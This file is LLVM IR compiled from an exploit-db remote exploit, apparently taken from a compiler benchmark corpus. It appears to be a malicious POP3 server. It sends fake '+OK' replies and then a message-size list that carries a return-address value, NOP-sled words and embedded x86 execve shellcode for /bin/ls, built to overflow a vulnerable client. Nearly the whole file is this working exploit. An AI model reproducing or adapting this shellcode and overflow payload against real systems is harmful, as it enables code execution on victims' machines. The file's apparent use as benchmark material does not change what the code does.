; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/unix/remote/extr_21066.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/unix/remote/extr_21066.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@SHELL_PTR = common dso_local global i32 0, align 4
@__const.main.shellcode = private unnamed_addr constant [48 x i8] c"\EB\1F^\89v\081\C0\88F\07\89F\0C\B0\0B\89\F3\8DN\08\8DV\0C\CD\801\DB\89\D8@\CD\80\E8\DC\FF\FF\FF/bin/ls\00\00\00", align 16
@.str = private unnamed_addr constant [38 x i8] c"+OK\0D\0A+OK\0D\0A+OK\0D\0A+OK %d 0\0D\0A+OK 0\0D\0A+OK\0D\0A\00", align 1
@MESSAGES = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [8 x i8] c"%d %d\0D\0A\00", align 1
@.str.2 = private unnamed_addr constant [4 x i8] c".\0D\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca [48 x i8], align 16
  %5 = alloca i32*, align 8
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %8 = load i32, i32* @SHELL_PTR, align 4
  store i32 %8, i32* %2, align 4
  store i32 -10, i32* %3, align 4
  %9 = bitcast [48 x i8]* %4 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %9, i8* align 16 getelementptr inbounds ([48 x i8], [48 x i8]* @__const.main.shellcode, i32 0, i32 0), i64 48, i1 false)
  %10 = getelementptr inbounds [48 x i8], [48 x i8]* %4, i64 0, i64 0
  %11 = bitcast i8* %10 to i32*
  store i32* %11, i32** %5, align 8
  store i32 -1869574000, i32* %6, align 4
  %12 = load i32, i32* @MESSAGES, align 4
  %13 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([38 x i8], [38 x i8]* @.str, i64 0, i64 0), i32 %12)
  %14 = load i32, i32* %3, align 4
  %15 = sub nsw i32 %14, 20
  store i32 %15, i32* %7, align 4
  br label %16

16:                                               ; preds = %25, %0
  %17 = load i32, i32* %7, align 4
  %18 = load i32, i32* %3, align 4
  %19 = add nsw i32 %18, 20
  %20 = icmp slt i32 %17, %19
  br i1 %20, label %21, label %28

21:                                               ; preds = %16
  %22 = load i32, i32* %7, align 4
  %23 = load i32, i32* %2, align 4
  %24 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0), i32 %22, i32 %23)
  br label %25

25:                                               ; preds = %21
  %26 = load i32, i32* %7, align 4
  %27 = add nsw i32 %26, 1
  store i32 %27, i32* %7, align 4
  br label %16

28:                                               ; preds = %16
  store i32 1, i32* %7, align 4
  br label %29

29:                                               ; preds = %36, %28
  %30 = load i32, i32* %7, align 4
  %31 = icmp slt i32 %30, 21
  br i1 %31, label %32, label %39

32:                                               ; preds = %29
  %33 = load i32, i32* %7, align 4
  %34 = load i32, i32* %6, align 4
  %35 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0), i32 %33, i32 %34)
  br label %36

36:                                               ; preds = %32
  %37 = load i32, i32* %7, align 4
  %38 = add nsw i32 %37, 1
  store i32 %38, i32* %7, align 4
  br label %29

39:                                               ; preds = %29
  store i32 21, i32* %7, align 4
  br label %40

40:                                               ; preds = %50, %39
  %41 = load i32, i32* %7, align 4
  %42 = sext i32 %41 to i64
  %43 = icmp ult i64 %42, 33
  br i1 %43, label %44, label %53

44:                                               ; preds = %40
  %45 = load i32, i32* %7, align 4
  %46 = load i32*, i32** %5, align 8
  %47 = getelementptr inbounds i32, i32* %46, i32 1
  store i32* %47, i32** %5, align 8
  %48 = load i32, i32* %46, align 4
  %49 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.1, i64 0, i64 0), i32 %45, i32 %48)
  br label %50

50:                                               ; preds = %44
  %51 = load i32, i32* %7, align 4
  %52 = add nsw i32 %51, 1
  store i32 %52, i32* %7, align 4
  br label %40

53:                                               ; preds = %40
  %54 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.2, i64 0, i64 0))
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1

declare dso_local i32 @printf(i8*, ...) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
